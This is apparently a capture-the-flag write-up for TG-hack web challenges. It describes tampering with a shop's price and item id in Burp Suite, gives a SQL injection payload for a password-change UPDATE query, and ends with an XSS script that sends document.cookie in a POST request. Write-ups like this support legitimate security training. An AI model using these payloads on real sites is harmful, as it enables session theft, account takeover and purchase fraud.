0%

TG-hack CTF Write Up

Tghack CTF WP

Redux

Author: Nora - Norasaurus#8234

Here is your Gaia form to get your weekly plant rations. Complete the form and reap your reward!

redux.tghack.no

FLAG in a JavaScript File.

Shop

Author: Roy Olav Purser - roypur#9953

We found the Mother cult merch store. In addition to selling clothing items they sell some secrets we need. For the time being we haven’t been able to secure the funds necessary to do so. Can you help us?

O-M-G,I regret it very much.😂My friends and I were still discussing last night about it might have changed the price to negative. I found it could be bought when the id undefined. But I forgot to check it when price to negative.

img

We use burp suite to packet capture and change the price to negative .It is very important to change the id to undefined.

e g:

img

And then,it happened that is amazing!We have more money!

img

OK,we can buy the flag….

img

Bobby

Author: Roy Olav Purser - roypur#9953

Little bobby forgot his password. Can you help him log in?

bobby.tghack.no

I didn’t find any bugs in this container at 1st😭.After a long time,My classmate told me ,it has an SQL injection in the new password param when you change the pass.

img

We can know that it’s a update sql and we can control a param .

eg:

update table set column=’param’ where ……

1st,I want to commented out “where“ and I write payload like the following . But it can ‘t change passwd and throw me an error…..

admin'-- ' WHERE user=? AND pass=?

img

From here we should bind 2 params to this sql.So we change this payload like this:

admin',user=? , pass=? -- 

img

And then , we changed this admin’s pass,we can get flag, when we login.

img

Exfiltration

Author: Roy Olav Purser - roypur#9953

We have found a forum used by members of the Mother cult. The members are sitting behind an advanced firewall without access to the internet. We need their super secret information.

exfiltration.tghack.no

<script>
let xhr = new XMLHttpRequest();
xhr.open("post", window.location.href, true);
xhr.send(document.cookie);
</script>